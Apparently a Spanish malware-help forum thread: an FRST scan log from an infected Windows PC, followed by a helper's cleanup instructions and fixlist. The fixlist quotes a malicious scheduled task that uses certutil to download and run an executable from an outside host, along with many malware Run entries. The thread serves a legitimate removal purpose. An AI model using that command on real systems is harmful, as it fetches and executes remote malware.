2017-09-14 07:42 - 2017-09-14 07:42 - 000033280 _____ (The Qt Company Ltd) [Archivo no firmado] C:\ProgramData\MEGAsync\imageformats\qicns.dll
2017-09-14 07:37 - 2017-09-14 07:37 - 000027648 _____ (The Qt Company Ltd) [Archivo no firmado] C:\ProgramData\MEGAsync\imageformats\qico.dll
2017-09-14 07:37 - 2017-09-14 07:37 - 000245760 _____ (The Qt Company Ltd) [Archivo no firmado] C:\ProgramData\MEGAsync\imageformats\qjpeg.dll
2017-09-14 07:42 - 2017-09-14 07:42 - 000021504 _____ (The Qt Company Ltd) [Archivo no firmado] C:\ProgramData\MEGAsync\imageformats\qsvg.dll
2017-09-14 07:42 - 2017-09-14 07:42 - 000020992 _____ (The Qt Company Ltd) [Archivo no firmado] C:\ProgramData\MEGAsync\imageformats\qtga.dll
2017-09-14 07:42 - 2017-09-14 07:42 - 000316416 _____ (The Qt Company Ltd) [Archivo no firmado] C:\ProgramData\MEGAsync\imageformats\qtiff.dll
2017-09-14 07:42 - 2017-09-14 07:42 - 000019968 _____ (The Qt Company Ltd) [Archivo no firmado] C:\ProgramData\MEGAsync\imageformats\qwbmp.dll
2017-09-14 07:42 - 2017-09-14 07:42 - 000322560 _____ (The Qt Company Ltd) [Archivo no firmado] C:\ProgramData\MEGAsync\imageformats\qwebp.dll
2017-09-14 07:37 - 2017-09-14 07:37 - 001010688 _____ (The Qt Company Ltd) [Archivo no firmado] C:\ProgramData\MEGAsync\platforms\qwindows.dll
2020-01-31 11:10 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-3TFQG.tmp\psvince.dll
2020-01-31 11:10 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-6BAIV.tmp\psvince.dll
2020-01-31 11:10 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-9SBJV.tmp\psvince.dll
2020-01-31 11:10 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-AJVC4.tmp\psvince.dll
2020-01-31 11:10 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-BLKKH.tmp\psvince.dll
2020-01-31 11:10 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-BLKKI.tmp\psvince.dll
2020-01-31 11:10 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-CD8CM.tmp\psvince.dll
2020-01-31 11:10 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-CJT48.tmp\psvince.dll
2020-01-31 11:10 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-FAB73.tmp\psvince.dll
2020-01-31 11:10 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-HRQMA.tmp\psvince.dll
2020-01-31 11:10 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-NSE98.tmp\psvince.dll
2020-01-31 11:10 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-O6NNI.tmp\psvince.dll
2020-01-31 11:10 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-RGEG7.tmp\psvince.dll
2020-01-31 11:10 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-RLT00.tmp\psvince.dll
2013-07-22 07:53 - 2013-07-22 07:53 - 000092672 _____ (zeta software GmbH) [Archivo no firmado] C:\Windows\assembly\NativeImages_v2.0.50727_64\ZetaLongPaths\94f192dc18aa649d7bdebce21e5597cd\ZetaLongPaths.ni.dll

==================== Alternate Data Streams (Lista blanca) ========

==================== Modo Seguro (Lista blanca) ==================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El "AlternateShell" será restaurado.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Asociación (Lista blanca) =================

==================== Internet Explorer sitios de confianza/restringidos ==========

(Si una entrada es incluida en el fixlist, será eliminada del registro.)

IE trusted site: HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\localhost -> localhost

==================== Hosts contenido: =========================

(Si es necesario, la directiva Hosts: puede ser incluida en el fixlist para restablecer Hosts.)

2009-07-14 03:34 - 2020-01-17 11:47 - 000000035 _____ C:\Windows\system32\drivers\etc\hosts

==================== Otras Áreas ===========================

(Actualmente no existe una corrección automática para esta sección.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Windows Live\Shared;C:\Program Files\Calibre2\;C:\Program Files (x86)\CineForm\Tools;E:\Archivos de Programa\GoPro\GoPro\Tools;C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static;E:\Archivos de Programa\QuickTime\QTSystem\
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\MrEidrian\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: El medio no está conectado a internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Firewall de Windows está habilitado.

==================== MSCONFIG/TASK MANAGER elementos deshabilitados ==

(Si una entrada es incluida en el fixlist, será eliminada.)

MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: EADM => "C:\Program Files (x86)\Origin\Origin.exe" -AutoStart
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: Steam => "E:\Juegos\Steam\steam.exe" -silent

==================== Reglas de firewall (Lista blanca) ================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

FirewallRules: [{DDE58438-22E4-4136-8A54-FF97F9AD1C0B}] => (Allow) C:\ProgramData\Google\ChromeDir\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{53867AA8-9E86-47B7-BBDF-E36C9AB5B2F9}] => (Allow) C:\ProgramData\Google\ChromeDir2\Application\chrome.exe (Google LLC -> Google LLC)

==================== Puntos de Restauración =========================

ATENCIÓN: Restaurar Sistema está deshabilitado (Total:55.9 GB) (Free:1.47 GB) (3%)

==================== Dispositivos defectuosos en el Administrador de dispositivos ============


==================== Errores del registro de eventos: ========================

Errores de aplicación:
==================
Error: (01/31/2020 11:08:33 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (01/17/2020 11:53:40 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (01/17/2020 11:34:55 AM) (Source: Microsoft-Windows-RestartManager) (EventID: 10006) (User: BANWORD)
Description: No se pudo cerrar la aplicación o el servicio 'TrustedLogos'.

Error: (01/17/2020 11:34:34 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: adwcleaner_7.4.exe, versión: 7.4.0.0, marca de tiempo: 0x5d3760f2
Nombre del módulo con errores: adwcleaner_7.4.exe, versión: 7.4.0.0, marca de tiempo: 0x5d3760f2
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x0041f4eb
Id. del proceso con errores: 0xe2c
Hora de inicio de la aplicación con errores: 0x01d5cd21a892fda4
Ruta de acceso de la aplicación con errores: C:\Users\MrEidrian\Desktop\adwcleaner_7.4.exe
Ruta de acceso del módulo con errores: C:\Users\MrEidrian\Desktop\adwcleaner_7.4.exe
Id. del informe: f3815e3b-3914-11ea-8443-6cf049e1b2f6

Error: (01/17/2020 11:34:18 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (10/18/2019 10:57:00 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: adwcleaner_7.4.exe, versión: 7.4.0.0, marca de tiempo: 0x5d3760f2
Nombre del módulo con errores: ntdll.dll, versión: 6.1.7601.17725, marca de tiempo: 0x4ec49b8f
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x0005b223
Id. del proceso con errores: 0x23b0
Hora de inicio de la aplicación con errores: 0x01d585981021227f
Ruta de acceso de la aplicación con errores: C:\Users\MrEidrian\Desktop\adwcleaner_7.4.exe
Ruta de acceso del módulo con errores: C:\Windows\SysWOW64\ntdll.dll
Id. del informe: a019db00-f18d-11e9-aa88-6cf049e1b2f6

Error: (10/18/2019 10:56:37 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: adwcleaner_7.4.exe, versión: 7.4.0.0, marca de tiempo: 0x5d3760f2
Nombre del módulo con errores: Pen_Tablet.dll_unloaded, versión: 0.0.0.0, marca de tiempo: 0x4e694dd7
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x700b32ac
Id. del proceso con errores: 0x23b0
Hora de inicio de la aplicación con errores: 0x01d585981021227f
Ruta de acceso de la aplicación con errores: C:\Users\MrEidrian\Desktop\adwcleaner_7.4.exe
Ruta de acceso del módulo con errores: Pen_Tablet.dll
Id. del informe: 92695c3b-f18d-11e9-aa88-6cf049e1b2f6

Error: (10/18/2019 10:39:40 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.


Errores del sistema:
=============
Error: (01/31/2020 11:10:53 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Se recibió la siguiente alerta irrecuperable: 40.

Error: (01/31/2020 11:10:53 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Se recibió la siguiente alerta irrecuperable: 40.

Error: (01/31/2020 11:10:53 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Se recibió la siguiente alerta irrecuperable: 40.

Error: (01/31/2020 11:10:38 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: El servicio TabletServicePen se terminó de manera inesperada. Esto ha sucedido 1 veces.

Error: (01/31/2020 11:10:38 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Se recibió la siguiente alerta irrecuperable: 40.

Error: (01/31/2020 11:10:38 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Se recibió la siguiente alerta irrecuperable: 40.

Error: (01/31/2020 11:10:37 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Se recibió la siguiente alerta irrecuperable: 40.

Error: (01/31/2020 11:07:20 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio Main Service no pudo iniciarse debido al siguiente error: 
El servicio no respondió a tiempo a la solicitud de inicio o de control.


CodeIntegrity:
===================================

Date: 2019-04-24 12:31:35.177
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume2\Windows\System32\drivers\usbser.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2019-04-24 12:31:35.167
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume2\Windows\System32\drivers\usbser.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2014-05-18 08:47:21.146
Description: 
Integridad de código no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume2\Windows\System32\l3codeca.acm porque el conjunto de hashes de imagen por página no se encuentra en el sistema.

Date: 2014-04-26 12:45:34.442
Description: 
Integridad de código no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume2\Windows\System32\l3codeca.acm porque el conjunto de hashes de imagen por página no se encuentra en el sistema.

Date: 2014-04-26 12:39:43.019
Description: 
Integridad de código no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume2\Windows\System32\l3codeca.acm porque el conjunto de hashes de imagen por página no se encuentra en el sistema.

Date: 2014-04-26 12:33:41.217
Description: 
Integridad de código no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume2\Windows\System32\l3codeca.acm porque el conjunto de hashes de imagen por página no se encuentra en el sistema.

Date: 2014-04-26 09:53:38.695
Description: 
Integridad de código no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume2\Windows\System32\l3codeca.acm porque el conjunto de hashes de imagen por página no se encuentra en el sistema.

Date: 2014-04-26 09:33:53.469
Description: 
Integridad de código no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume2\Windows\System32\l3codeca.acm porque el conjunto de hashes de imagen por página no se encuentra en el sistema.

==================== Información de la memoria =========================== 

BIOS: Award Software International, Inc. F15 09/16/2010
Placa base: Gigabyte Technology Co., Ltd. P55A-UD4
Procesador: Intel(R) Core(TM) i5 CPU 750 @ 2.67GHz
Porcentaje de memoria en uso: 89%
RAM física total: 4087.43 MB
RAM física disponible: 432.53 MB
Virtual total: 8173.05 MB
Virtual disponible: 2555.36 MB

==================== Unidades ================================

Drive c: () (Fixed) (Total:55.9 GB) (Free:1.47 GB) NTFS
Drive e: () (Fixed) (Total:931.41 GB) (Free:275.69 GB) NTFS ==>[sistema con componentes de arranque (obtenido de unidad)]


==================== MBR & Tabla de particiones ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: DAAB2ADC)
Partition 1: (Active) - (Size=931.4 GB) - (Type=07 NTFS)

==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 55.9 GB) (Disk ID: DAAB2AA4)
Partition 1: (Not Active) - (Size=55.9 GB) - (Type=07 NTFS)

==================== Final de Addition.txt =======================
18

Hola

Para no usar el ordenador, hay muchas entradas nuevas :thinking:

:arrow_forward: MUY Importante :arrow_backward: Realiza una copia de seguridad del registro :

  • Para hacerlo descarga :arrow_forward: DelFix.exe( en tu escritorio).

  • Doble clic para ejecutarlo.(Si usas Windows Vista/7/8 o 10 presiona clic derecho y selecciona -Ejecutar como Administrador-).

  • Atención, ahora marca/selecciona únicamente la casilla "Create registry backup", las demás NO.

  • Pulsar en Run.

Se abrirá el informe (DelFix.txt), guárdalo por si fuera necesario y cierra la herramienta.

A continuación :warning: con los demás programas cerrados ve a :arrow_forward: Inicio :arrow_forward: Ejecutar :arrow_forward: y escribe Notepad.exe.

  • Ahora debes copiar y pegar los códigos/líneas que están en el interior del recuadro de más abajo, dentro del Notepad.
START
CREATERESTOREPOINT:
CLOSEPROCESSES:
( ) [Archivo no firmado] C:\ProgramData\EventSvc\work0.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\2j3xhwl5gqf\0xyemshxszc.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\4plii4obowa\vkfgpve1kmf.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\a5cqdmrbe54\pvtkqi5q5e2.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\dia1nwsj1y1\251zwfb1una.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\frr3pwvyetd\sqhrsfjrtyk.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\g2dncbivjiz\sbatxjutel4.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\hi4mbly3ii3\xpvfw24cqky.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\kdua1jfo123\vvegzej4wy2.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\mprw3ktcc2k\emdwzefyk2y.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\n0pczckdhog\i4loeahzfup.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\uhnrjry4bdn\jujerzwizaa.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\vfbtqr24hkh\oswlgg15f1h.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\vntlutefrev\30rwyhw2iwt.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\x4sjscyv4hq\0pbpdqr0a5k.exe
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\3jl4s2k53rn\SRBhd0G8wx=.exe
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-007J5.tmp\oswlgg15f1h.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-1801B.tmp\251zwfb1una.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-27APO.tmp\emdwzefyk2y.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-3RUQC.tmp\0pbpdqr0a5k.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-AGTBR.tmp\xpvfw24cqky.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-GHA5E.tmp\0xyemshxszc.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-HQODJ.tmp\sbatxjutel4.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-I1NTH.tmp\sqhrsfjrtyk.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-I2K7L.tmp\30rwyhw2iwt.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-I4PTQ.tmp\vkfgpve1kmf.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-LVUEI.tmp\pvtkqi5q5e2.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-QLBVR.tmp\vvegzej4wy2.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-SDRGI.tmp\jujerzwizaa.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-T0S8A.tmp\i4loeahzfup.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\yhjfhl3s13b\Processlasso.exe
(5) [Archivo no firmado] C:\Program Files\0OP808P0KJ\IGQIGKLAV.exe
(5) [Archivo no firmado] C:\Program Files\6S3KYHHWIU\6S3KYHHWI.exe
(5) [Archivo no firmado] C:\Program Files\85E8BNNBEE\85E8BNNBE.exe
(5) [Archivo no firmado] C:\Program Files\9B24IF9AQM\9B24IF9AQ.exe
(5) [Archivo no firmado] C:\Program Files\ERTC7W5OYX\ERTC7W5OY.exe
(5) [Archivo no firmado] C:\Program Files\KHJ98BRLDV\U5XXOJRBU.exe
(5) [Archivo no firmado] C:\Program Files\NPUOW5G9P5\NPUOW5G9P.exe
(5) [Archivo no firmado] C:\Program Files\U24HP4O5BP\U24HP4O5B.exe
(5) [Archivo no firmado] C:\Program Files\U5EES31B4Q\8CRMSAUET.exe
(5) [Archivo no firmado] C:\Program Files\WAK3MKKWFC\WAK3MKKWF.exe
(5) [Archivo no firmado] C:\Program Files\YUGF9ZIQK7\YUGF9ZIQK.exe
(5) [Archivo no firmado] C:\Program Files\ZWD63K22V7\ZWD63K22V.exe
(AN045KE6) [Archivo no firmado] C:\Program Files\AUXDGUNQ0L\AUXDGUNQ0.exe
(AN045KE6) [Archivo no firmado] C:\Program Files\NJ4SOTTRZH\NJ4SOTTRZ.exe
(Anomie4) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\St3mqofQ.exe
(TRAENGERB) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-I758J.tmp\lshost.exe
(TRAENGERB) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-IDB8M.tmp\lshost.exe
HKLM\...\RunOnce: [wzq2q1j2xzy] => C:\Program Files (x86)\Yhanj\679940659.exe [485888 2019-08-31] (FlyStreets) [Archivo no firmado]
HKLM\...\RunOnce: [0e52wlmipja] => C:\Program Files (x86)\Yhanj\25388233.exe [485888 2019-08-31] (FlyStreets) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [GDHV8HQ09I0MW20] => C:\Program Files\KHJ98BRLDV\U5XXOJRBU.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [DUJBOJYM2QES8U3] => C:\Program Files\0OP808P0KJ\IGQIGKLAV.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [7543004] => C:\Users\MrEidrian\AppData\Roaming\frr3pwvyetd\sqhrsfjrtyk.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [1714324] => C:\Users\MrEidrian\AppData\Roaming\dia1nwsj1y1\251zwfb1una.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [HQHN7D6DKMX5F12] => C:\Program Files\WAK3MKKWFC\WAK3MKKWF.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [OD8V24UG04MY8H6] => C:\Program Files\YUGF9ZIQK7\YUGF9ZIQK.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [4692347] => C:\Users\MrEidrian\AppData\Roaming\n0pczckdhog\i4loeahzfup.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [6172493] => C:\Users\MrEidrian\AppData\Roaming\a5cqdmrbe54\pvtkqi5q5e2.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [QJXDKB3T0NBCZUM] => C:\Program Files\9B24IF9AQM\9B24IF9AQ.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [GXB70AFVZGVBZI1] => C:\Program Files\6S3KYHHWIU\6S3KYHHWI.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [4803196] => C:\Users\MrEidrian\AppData\Roaming\g2dncbivjiz\sbatxjutel4.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [7438577] => C:\Users\MrEidrian\AppData\Roaming\kdua1jfo123\vvegzej4wy2.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [88YLCFXRTWHOKTL] => C:\Program Files\ERTC7W5OYX\ERTC7W5OY.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [1387278] => C:\Users\MrEidrian\AppData\Roaming\mprw3ktcc2k\emdwzefyk2y.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [8525450] => C:\Users\MrEidrian\AppData\Roaming\hi4mbly3ii3\xpvfw24cqky.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [GFM4VKKOD8QYWVS] => C:\Program Files\U24HP4O5BP\U24HP4O5B.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [249KMWAKWKTT3J9] => C:\Program Files\NPUOW5G9P5\NPUOW5G9P.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [8R0SHNZNB2ILWZC] => C:\Program Files\ZWD63K22V7\ZWD63K22V.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [5972726] => C:\Users\MrEidrian\AppData\Roaming\4plii4obowa\vkfgpve1kmf.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [964528] => C:\Users\MrEidrian\AppData\Roaming\2j3xhwl5gqf\0xyemshxszc.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [VM227E5VN1KEOF3] => C:\Program Files\85E8BNNBEE\85E8BNNBE.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [HK4FKEDFGACN422] => C:\Program Files\U5EES31B4Q\8CRMSAUET.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [8825304] => C:\Users\MrEidrian\AppData\Roaming\x4sjscyv4hq\0pbpdqr0a5k.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [5910964] => C:\Users\MrEidrian\AppData\Roaming\uhnrjry4bdn\jujerzwizaa.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [ZSBC9OI36Z15QG5] => C:\Program Files\NJ4SOTTRZH\NJ4SOTTRZ.exe [1004544 2020-01-31] (AN045KE6) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [6851699] => C:\Users\MrEidrian\AppData\Roaming\vntlutefrev\30rwyhw2iwt.exe [1042615 2020-01-31] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [5200897] => C:\Users\MrEidrian\AppData\Roaming\vfbtqr24hkh\oswlgg15f1h.exe [1042615 2020-01-31] ( ) [Archivo no firmado]
Task: {DE0E33E3-8A41-451E-A4B7-B84AF703FF42} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://bigtext.club/app/app.exe C:\Users\MrEidrian\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\MrEidrian\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATENCIÓN
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.qvo6.com/?utm_source=b&utm_medium=cor&from=cor&uid=SAMSUNGXHD103SJ_S246J90Z484516&ts=1372918643
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [2013-10-21] (Pando Networks, Inc. -> Pando Networks)
FF Plugin HKU\S-1-5-21-3862230028-3041123482-801023079-1000: pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [2013-10-21] (Pando Networks, Inc. -> Pando Networks)
CHR Extension: (book_helper) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\mihbhonnpblfklefmifmdampkldmloog [2019-09-01]
